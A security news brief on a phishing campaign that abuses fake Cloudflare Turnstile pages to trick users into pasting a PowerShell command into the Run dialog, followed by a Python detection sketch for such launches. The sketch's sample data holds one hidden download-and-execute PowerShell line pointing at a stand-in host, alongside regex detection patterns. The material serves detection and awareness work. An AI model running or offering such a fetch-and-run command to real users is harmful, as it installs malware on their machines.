Phishing
Bogus Cloudflare Turnstile leveraged in new ClickFix-style intrusion

Threat actors have leveraged counterfeit Cloudflare Turnstile challenges used to check 'humanness' to facilitate clandestine malware compromise as part of a new ClickFix-style campaign, SecurityWeek reports.
Intrusions involved luring targets into visiting a phishing site that displays the fake Turnstile page and loads a malicious PowerShell command into the clipboard, a report from SlashNext showed. Subsequent user verification is then followed by instructions that open the Windows Run dialog box, copy clipboard content, and execute the command, which facilitates in-memory execution of the malware, SlashNext researchers said. Such an attack scheme, which merges living-off-the-land binaries and social engineering tactics, is challenging to detect without the presence of additional security controls, according to cybersecurity experts. "Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks," said Menlo Security Chief Security Architect Lionel Litty.
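A detection sketch for the Run-dialog step described above, added here as an example and not taken from SlashNext, SecurityWeek or SC Media: it flags process-creation events in which explorer.exe (the parent of anything started from the Run dialog) launches a script host whose command line shows hidden-window, inline-evaluation or remote-fetch traits. Field names follow Sysmon Event ID 1; the trait patterns, the script-host list, the host names and the sample events are constructed assumptions.

```python
import re

# Script hosts a user can be talked into starting from Win+R (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits rarely seen in legitimate Run-dialog use (assumed heuristics).
TRAITS = {
    "hidden_window": re.compile(r"(?i)\s-w\w*\s+h(idden)?\b"),
    "inline_eval": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "remote_fetch": re.compile(
        r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b|https?://"),
}

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def run_dialog_findings(events, min_traits=1):
    """Return one finding per event where explorer.exe starts a script host
    with at least `min_traits` suspicious command-line traits."""
    findings = []
    for ev in events:
        # explorer.exe also parents Start-menu and shortcut launches, so the
        # parent check alone is not proof of Run-dialog use; the traits narrow it.
        if basename(ev["ParentImage"]) != "explorer.exe":
            continue
        if basename(ev["Image"]) not in SCRIPT_HOSTS:
            continue
        hits = sorted(n for n, rx in TRAITS.items() if rx.search(ev["CommandLine"]))
        if len(hits) >= min_traits:
            findings.append({"host": ev["Computer"],
                             "image": basename(ev["Image"]), "traits": hits})
    return findings

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = [
    {"Computer": "WS-CONSTRUCTED-01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm https://example.invalid/constructed)"'},
    {"Computer": "WS-CONSTRUCTED-02", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f'"{PS}"'},  # admin opening an interactive console
    {"Computer": "WS-CONSTRUCTED-03", "ParentImage": r"C:\Tools\code.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Invoke-Expression $task"},
    {"Computer": "WS-CONSTRUCTED-04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in run_dialog_findings(SAMPLE_EVENTS):
        print(finding)
```

Raising `min_traits` trades coverage for fewer alerts on hosts where administrators routinely start PowerShell from the Run dialog.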